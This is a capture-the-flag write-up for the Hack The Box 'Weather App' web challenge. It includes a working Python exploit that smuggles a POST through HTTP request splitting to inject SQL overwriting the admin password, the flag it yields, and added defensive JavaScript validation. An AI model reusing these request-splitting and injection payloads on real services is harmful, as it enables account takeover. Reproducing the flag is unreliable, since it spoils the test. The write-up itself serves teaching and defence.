kali@kali:~/0.htb/challenges/Web/Weather_App/web_weather_app$ sudo ./build-docker.sh
Then access the challenge at http://127.0.0.1:1337
Now, let's dig into the code. This is a Node.js app using express, so we can see all 4 available routes at routes/index.js.
/, /register, /login, /api/weather
Let's take a look at the database functions inside database.js:
The username column is UNIQUE, and there is already a user with username 'admin'.
The isAdmin() function is not vulnerable to injection, since it uses '?' placeholders to bind the parameters into the query, so quotes are escaped. However, the register() function is vulnerable, since it builds the query without '?'. This means that the only way to inject a malicious payload into the database is by registering a new user.
Server-Side Request Forgery
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
https://github.com/hacefresko/HTB-Web-WriteUps/blob/main/Weather%20App/Weather%20App.md
ssrf.py
import requests

url = 'http://138.68.182.108:31439'

username = "admin"
# SQLite upsert: the INSERT collides with the UNIQUE username 'admin', and the
# ON CONFLICT clause overwrites the existing admin password instead of failing.
password = "1337') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"

# The endpoint ends up in the outbound request path. The vulnerable Node.js
# client keeps only the low byte of each character, so \u0120 becomes a space,
# \u010D becomes CR and \u010A becomes LF (request splitting). Quotes are
# url-encoded because the smuggled body is application/x-www-form-urlencoded.
parsedUsername = username.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
parsedPassword = password.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")

# 19 == len('username=') + len('&password=')
contentLength = len(parsedUsername) + len(parsedPassword) + 19

# First request line is closed early, then a POST to /register is smuggled in,
# and a trailing GET absorbs whatever the server appends after the endpoint.
endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010Ausername=' + parsedUsername + '&password=' + parsedPassword + '\u010D\u010A\u010D\u010AGET\u0120/?lot='

r = requests.post(url + '/api/weather', json={'endpoint': endpoint, 'city': 'lol', 'country': 'lol'})
print(r.status_code)
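The script above relies on the low-byte truncation that the Node.js http client applied to non-Latin-1 characters in a path. The following is an added example written for this writeup, not code from the challenge: it reproduces that truncation so you can see why \u010D\u010A turns into CRLF, and shows the kind of guard the /api/weather handler should have applied to the user-supplied endpoint before building an outbound request. The allowlisted hostname weather-api.example is a placeholder, since the writeup does not name the upstream API.

```javascript
// Added example, not part of the challenge source.

// Keep only the low 8 bits of every UTF-16 code unit, mirroring the legacy
// latin1 path encoding that made request splitting possible.
function truncateToLatin1(path) {
  let out = '';
  for (let i = 0; i < path.length; i++) {
    out += String.fromCharCode(path.charCodeAt(i) & 0xff);
  }
  return out;
}

// True when the path, as the legacy client would have sent it, contains CR,
// LF or a space: any of these lets the caller end the request line early.
function hasSplittingRisk(path) {
  return /[\r\n ]/.test(truncateToLatin1(path));
}

// Defensive check for the endpoint parameter: printable ASCII only (no
// whitespace or control characters, so nothing that can collapse into CR/LF),
// and only a hostname the application is meant to reach.
const ALLOWED_HOSTS = new Set(['weather-api.example']); // assumed allowlist
function isSafeEndpoint(endpoint) {
  if (typeof endpoint !== 'string' || !/^[\x21-\x7e]+$/.test(endpoint)) return false;
  let parsed;
  try {
    parsed = new URL('http://' + endpoint);
  } catch (e) {
    return false;
  }
  return ALLOWED_HOSTS.has(parsed.hostname);
}

module.exports = { truncateToLatin1, hasSplittingRisk, isSafeEndpoint };
```

Run against the endpoint string from ssrf.py, hasSplittingRisk returns true and isSafeEndpoint returns false; a plain ASCII path to the allowlisted host passes both checks. The same idea applies to register(): binding the username and password with '?' placeholders, as isAdmin() already does, removes the SQL injection that the smuggled POST depends on.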
kali@kali:~/0.htb/challenges/Web/Weather_App$ python3 ssrf.py
Now log in at http://138.68.182.108:31439/login with username admin and password admin to get the flag:
HTB{w3lc0m3_t0_th3_p1p3_dr34m}